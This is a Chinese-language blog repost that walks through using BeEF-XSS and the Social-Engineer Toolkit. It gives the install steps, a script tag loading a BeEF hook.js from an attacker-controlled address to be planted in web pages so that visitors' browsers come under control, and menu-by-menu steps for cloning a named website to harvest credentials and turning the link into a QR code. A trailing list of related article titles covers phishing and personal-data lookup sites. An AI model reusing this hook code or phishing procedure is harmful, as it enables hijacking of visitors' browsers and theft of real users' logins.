网站克隆:setoolkit社工软件
本文转自行云博客https://www.xy586.top
beef-xss
安装beef-xss:apt install beef-xss
安装完成之后运行beef-xss:
登录网址:http://192.168.232.138:3000/ui/authentication
将beef-xss生成的js代码,放入网站中
<script src="http://192.168.232.138:3000/hook.js"></script>
被攻击目标打开网页链接,则beef中得到该电脑控制
setoolkit:
kali自带setoolkit,终端直接输入setoolkit运行
选择1
接着选择2,web攻击:
选择3)credential harvester attack method:
选择2)site cloner:
IP默认,克隆网站:http://www.51bb0.cn
登录IP,克隆成功
还可使用setoolkit将网页URL生成二维码,
选择8)QRCode Generator Attack Vectors:
输入网址:www.51bbO.cn生成二维码
在/root/.set/reports文件夹下,将生成的二维码导出:
sz qrcode_attack.png
网站克隆:setoolkit社工软件相关推荐
- 犯罪分子社工GoDaddy 员工,获得密币相关网站域名的控制权
聚焦源代码安全,网罗国内外最新资讯! 编译:奇安信代码卫士团队 提要 犯罪分子利用社工,欺骗 GoDaddy 员工,劫持了多个密币相关网站的流量和邮件. 黑客使用社工技术,更改了受害者域名的 DNS ...
- 社工利器--setoolkit之钓鱼攻击
该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋.很多企业.公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生 ...
- 社工工具包 SEToolkit
社会工程学(Social Engineering)简称社工,其通过分析攻击对象的心理弱点,利用人性的本能反应,以及任何好奇心,贪婪等心理特征进行的,使用诸如假冒,欺骗,引诱等多种手段来达成攻击目标的一 ...
- 最新社工库在线查询网站
社工查询网站 手机号注册网站查询 信用查询 国内企业信息 政府信息查询 身份信息查询 驾驶员及车辆信息查询 物品资产查询 物流查询 发票查询 金融查询 手机信息查询 个人信息查询 搜索引擎 手机号注册 ...
- 社工库365开网站公开售卖盗取的账号信息
如今网上盗号猖獗,个人信息泄露严重. 社工库365开网站公开售卖盗取的账号信息,我测试了下,的确可以查询到密码信息.包括很早以前注册的账号,163.126都沦陷了,密码的md5值都暴露出来了. 过了2 ...
- access制作封装软件_用Access开发《社工服务管理系统》
2018年初结缘盟威软件,了解其Access快速开发平台,特别惊喜,这不就是自己一直想要苦苦寻觅的平台吗?但那时候刚毕业工作,对于工作业务流程不是特别的了解,没有进一步深入了解,而且需要代码,所以只能 ...
- Ip探针_信息探针_社工查询个人信息php网站源码
介绍: Ip探针_信息探针_社工查询个人信息php网站源码 他可以查IP 精确位置 然后社工地址的话更准 需要的东西: 服务器或主机一部 2.浏览器搜索 二级域名分发 很多免费的 3.绑定域名 4.上 ...
- 简单的钓鱼网站制作-Setoolkit
Setoolki这个工具在kali自带,github地址:https://github.com/trustedsec/social-engineer-toolkit git clone https:/ ...
- 渗透测试与攻防对抗-信息收集与社工技巧
文章目录 信息收集与社工技巧 1.信息收集总览 2.信息收集-DNS 3.信息收集-子域名收集 4.信息收集-C段扫描 5.信息收集-Web目录扫描 6.信息收集-指纹识别 7.Google Hack ...
- 信息收集——网站克隆和钓鱼邮件
普及网站克隆方法和邮件伪造原理和方法 网站克隆 复制目标网站前端信息 构建相似网页 获取用户登录数据 方法 cotaltstrike能够快速复制目标网站前端页面,并且复制相识度极高 cotaltstr ...
最新文章
- python xml字符串和dict字典互转
- 埃及冒险java_我的世界1.7.10亚图姆探险整合包
- mysql镜像远程连接_Docker创建MySQL镜像并成功进行远程连接
- MvcScaffold快速开发实例
- Hive:表1inner join表2结果group by优化
- PostgreSQL 荣获 2019 年 O'Reilly 终身成就奖
- 第一次正面交火!版主说博文里有广告!
- php取json子对象属性,PHP json获取相关对象值
- ssis 包部署_如何使用各种选项从SSIS目录执行已部署的程序包
- 网页设计中时尚​​的下拉菜单案例
- 配置kafka Server
- HDU2003 求绝对值【入门】
- 关于RDP报表工具参数配置
- jQuery中id包含特殊字符,以及包含变量时处理。
- 解决vscode打开txt文件乱码
- JS一些常用证件信息的正则表达式
- SAP系统用户账号类型介绍
- 威斯康星麦迪逊计算机科学专业,威斯康星大学麦迪逊分校计算机科学专业申请条件汇总...
- 最简单DIY基于STM32单片机的蓝牙智能小车设计方案
- 加强版Apktool堪称逆向神器
热门文章
- linux基于i2c-tools快速搭建设备读写环境
- 昼夜双色导航主题模板 WordPress导航模板
- 2022年6月25日PMP考试通关宝典-4
- 数据结构与算法(C语言版)——陈越
- gaot工具箱介绍及应用
- php cas 票据认证失败,解决CAS客户端验证ST票据时发生的TicketValidationException问题...
- python怎么看自己安装的第三方包_安装第三方包查看python版本/第三方包版本
- github 思维导图开元软件_最强大脑!这 7 款开源思维导图工具真的很神奇
- 软考资料合集/软考真题合集(软件设计师/网络工程师/系统分析师/系统架构师/软件测评师/程序员等)
- 聚合影视大全android版,聚合影视App下载-聚合影视大全2021最新版 1.5.0 安卓版-我游网...